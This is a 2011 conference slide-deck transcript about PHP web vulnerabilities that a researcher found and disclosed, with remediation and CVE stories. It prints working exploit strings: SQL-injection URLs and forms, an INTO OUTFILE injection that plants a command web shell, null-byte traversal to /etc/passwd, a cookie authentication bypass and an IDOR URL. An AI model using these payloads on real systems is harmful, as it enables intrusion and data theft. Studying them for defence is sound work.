It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

Its Vulnerable… Now What? Three Diverse Tales of Woe and RemediationMark Stanislav <mark.stanislav@gmail.com>

De-Facto Quote Slide“Thank goodness the working exploitwill remain as the ‘gold standard’ forcutting through the BS in the ﬁeld ofdata security for the foreseeable future.” - Marsh Ray Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit

The More Hats The Better

The More Hats The BetterDay Job: Linux systems administrator

The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a university

The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilities

The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilitiesSide Note: PHP programmer for ~10 years* * Quickly becoming a Ruby ﬁend

PHP Vulnerability Primer

PHP Vulnerability PrimerInputs That Get Owned:

PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav

PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”>

PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”> $_COOKIE: Cookies Chocolate Chip -- nom nom.

PHP Vulnerability Primer, cont.

PHP Vulnerability Primer, cont.Common Attacks:

PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd ﬁle

PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd ﬁle SQL Injection Show me your user table

PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd ﬁle SQL Injection Show me your user table Authentication/Authorization Bypass Who needs a username or password?

Tale #1 - On The Clock

Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirﬁnancial service company (Forex)

Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirﬁnancial service company (Forex)Problem: Developer has no businesswriting a ‘Hello, World!’ application, letalone a web application handling creditcard data

Vulnerabilities Found

Vulnerabilities FoundAdjust ‘membership level’ of any account

Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded default

Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired value

Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accounts

Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account information

Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account details

Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account detailsCreate an administrative user account

Clown Shoes“Something or someone that is a total joke” Source: Urban Dictionary; it’s legit

Code Review, Part #1

Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}

Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.com

Code Review, Part #1Vulnerable Code function updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email"); }Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.comWhy The Code Sucks•No authentication prior to allowing execution of updateMembershipLevel()•There is no audit trail to changes being made through this function•The code does not escape or sanitize $_GET variables being passed

Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}

Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>

Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>•Only the password input Sucks properly, the ‘resetkey’ $_POST input is notWhy The Code is escaped•SQL doesn’t use parameterized statements to protect against general SQLinjection

Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}

Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1

Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1Why The Code Sucks•insertUser() method isn’t restricted from being available to unauthenticated site visitors•is_SuperUser() doesn’t affect arbitrary calls to add a user to the database•No sanitization or verification is done to any data based on $_GET variables passed

Remediation

RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.

RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.

RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.Fun Fact: The developer who wrote this codeuses the same code-base for 30+ sites currentlyonline using the same framework...

What’s a CVE?

What’s a CVE?Common Vulnerabilities & Exposures

What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identiﬁer will give you a standardizedidentiﬁer for any given vulnerability orexposure.” - MITRE CVE FAQ

What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identiﬁer will give you a standardizedidentiﬁer for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offerings

What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identiﬁer will give you a standardizedidentiﬁer for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ process

What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identiﬁer will give you a standardizedidentiﬁer for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to reference

What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identiﬁer will give you a standardizedidentiﬁer for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to referenceHelps to prevent duplication of vulnerabilities

How Do I Get a CVE?

How Do I Get a CVE?1.Find the vulnerability -- score!

How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.

How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)

How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and ﬁxes the issue

How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and ﬁxes the issue5.Release your advisory with the CVE included

How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and ﬁxes the issue5.Release your advisory with the CVE included6.Provide links of publication back to MITRE

Tale #2 - The Community

Tale #2 - The CommunityScenario: Random PHP applications you ﬁndon SourceForge.net & FreshMeat.net

Tale #2 - The CommunityScenario: Random PHP applications you ﬁndon SourceForge.net & FreshMeat.netProblem: Not everyone releasing free (as inGNU) or paid (as in $$$) are goodprogrammers -- surprise!

WSN Links SQL Injection

WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitation

WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categoriesWhy The Code Sucks•Improper sanitization of $_GET inputs within some functions of search•No explicit installation recommendation to prevent FILE privilege•Side Note: foo.php?debug=1 turns on debugging in the default installation

WSN Links Remediation

WSN Links RemediationCVE-2010-4006

WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘ﬁx’ to the issue

WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘ﬁx’ to the issueNew version released 3 days after notiﬁcationhad occurred

WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurredIt would be better to actually fix all of the SQLinjection bugs (yes, there are more) rather thanusing a bandage like a UNION blacklist

Pointter CMS Authentication Bypass

Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}

Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.

Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.Why The Code Sucks•There’s no reason to store a password cookie in the first place•A session cookie should be unique and encrypted•Blank cookies should never be used as a form of authentication

Pointter CMS Remediation

Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333

Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerability

Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to ﬁx the issue

Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to ﬁx the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)

Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to ﬁx the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)Vendor claims that the user should rename theiradmin folder to hide, erm... prevent the issue! =)

The Swiss“Not as docile as you’d expect...” Source: Me; it’s legit

E-Mail Outtakes!

E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”

E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”

E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”“What you are trying to do, is to ﬁnd a securityhole and publish it so that everyone can hack asystem. This is the illegal part so be aware ofthis.”

E-Mail Outtakes!, cont.

E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis the same as telling someone how to build abomb.”

E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis the same as telling someone how to build abomb.”“Of course, it could be made safer and we knowhow to do it. But we have designed thesoftwares so that renaming admin folder givesus less work.”

Null-Byte Attack Primer

Null-Byte Attack PrimerPHP uses C functions for ﬁlesystem calls whichreads a null-byte as ‘end of string’

Null-Byte Attack PrimerPHP uses C functions for ﬁlesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘ﬁle’] . “.php”);

Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd

Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);

Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);index.php?file=../../../etc/passwd%00

Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);index.php?file=../../../etc/passwd%00 include(“/var/www/../../../etc/passwd”);

Pulse CMS Local File Inclusion

Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}

Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}Exploitindex.php?p=/../../../../../../../../../../../../../../etc/passwd%00

Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}Exploitindex.php?p=/../../../../../../../../../../../../../../etc/passwd%00Why The Code Sucks•This method to prevent LFI is easily defeated with magic_quotes_gpc disabled•There’s no sanitization or regex used to prevent LFI attacks•Null-byte attacks are a problem with PHP (C-based) and need to be considered

Pulse CMS Remediation

Pulse CMS RemediationCVE-2010-4330

Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days later

Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days laterNull-byte attacks are a real problem andprogrammers need to program with it in mind

Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days laterNull-byte attacks are a real problem andprogrammers need to program with it in mindFile inclusion from a user-controlled variableshould heavily interrogated (regex/sanitization)

Tale #3 - SaaS Gone Wrong

Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membership

Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membershipProblem: Your gym’s online ﬁtness integrationweb site has broken Single Sign-On causingmassive PII/PHI leakage

SSO “Bypass”

SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}

SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}Exploithttp://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]

SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}Exploithttp://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]Why The Code Sucks•It didn’t require users to ‘sign-up’ for some of their data to be available•Complete SSO implementation failure•No one could have possibly tested/QA’ed this code before it was launched

Vulnerability Veriﬁcation

Vulnerability VeriﬁcationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anactivated or unactivated state.

Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anactivated or unactivated state.Script #2: Of the 1,000 memberid valueschecked, 76 accounts were activated. One userprofile had a picture, eight users had listed phonenumbers, and at least one user had a medicalquestionnaire filled-out.

Information Being Disclosed

Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail Address

Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail AddressActivated Account: Photo, First Name, LastName, Date of Birth, Gender, E-Mail Address,Phone Number, Height, Weight, Body Fat %,Timezone, Gym Membership Company,Workout Schedule, and Medical History (bloodpressure issues, heart problems, recent surgery,pregnancy, diabetes, etc.)

Remediation

RemediationContacted CEO (small company) with a report

RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) added

RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) addedConsistently reafﬁrmed my commitment to helpand deﬂected any comments towards me beingsome kind of nefarious hacker

RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) addedConsistently reaffirmed my commitment to helpand deflected any comments towards me beingsome kind of nefarious hackerTook three weeks after successful contact tohave the issue actually fixed...

Customers Notiﬁed

Customers Notiﬁed 90,000+

But be careful...

But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problem

But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously afﬁrmyour desire to protect people and information

But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously afﬁrmyour desire to protect people and informationAnyone can be sued at anytime for anything inour country -- it doesn’t mean you’re guilty, butyou can certainly lose time and money this way

But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously afﬁrmyour desire to protect people and informationAnyone can be sued at anytime for anything inour country -- it doesn’t mean you’re guilty, butyou can certainly lose time and money this wayLet your ethics and common sense lead you...

Generalized Take-Aways

Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten you

Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offer

Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offerResponsible disclosure allows you to make morefriends than enemies; most people are reallyappreciative of your assistance

Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offerResponsible disclosure allows you to make morefriends than enemies; most people are reallyappreciative of your assistanceVulnerability research is tediously fun! ;)

My Thoughts...

My Thoughts...Info Sec. is everyone’s responsibility

My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”

My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”Ethics and information security are not, in mymind, allowed to be separated

My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”Ethics and information security are not, in mymind, allowed to be separatedThis isn’t about 1337 ‘sploits. It’s aboutprotecting your business, your friends, yourfamily, and yourself from unethical people

Thanks...Jon Oberheide - Duo SecuritySteve Christy - MITRETodd Jarvis - Packet Storm Security

ContactE-Mail: mark.stanislav@gmail.comTwitter: @markstanislavWebsite: http://www.uncompiled.com

It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

by Mark Stanislav on May 18, 2011

Accessibility

Categories

Tags

Upload Details

Usage Rights

1 Embed 1

Statistics

It’s Vulnerable… Now What?: Three Tales of Woe and Remediation — Presentation Transcript